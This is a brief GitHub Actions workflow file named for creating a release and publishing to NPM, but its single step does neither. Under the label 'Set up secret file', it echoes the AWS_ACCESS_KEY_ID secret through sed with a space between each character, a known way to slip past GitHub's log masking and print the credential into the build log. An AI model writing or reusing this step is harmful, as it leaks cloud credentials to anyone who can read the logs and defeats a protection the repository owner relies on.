name: Create Release and Publish to NPM

on:
  push:
    branches:
      - master


jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Set up secret file
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
        run: |
          echo ${{secrets.AWS_ACCESS_KEY_ID}} | sed 's/./& /g'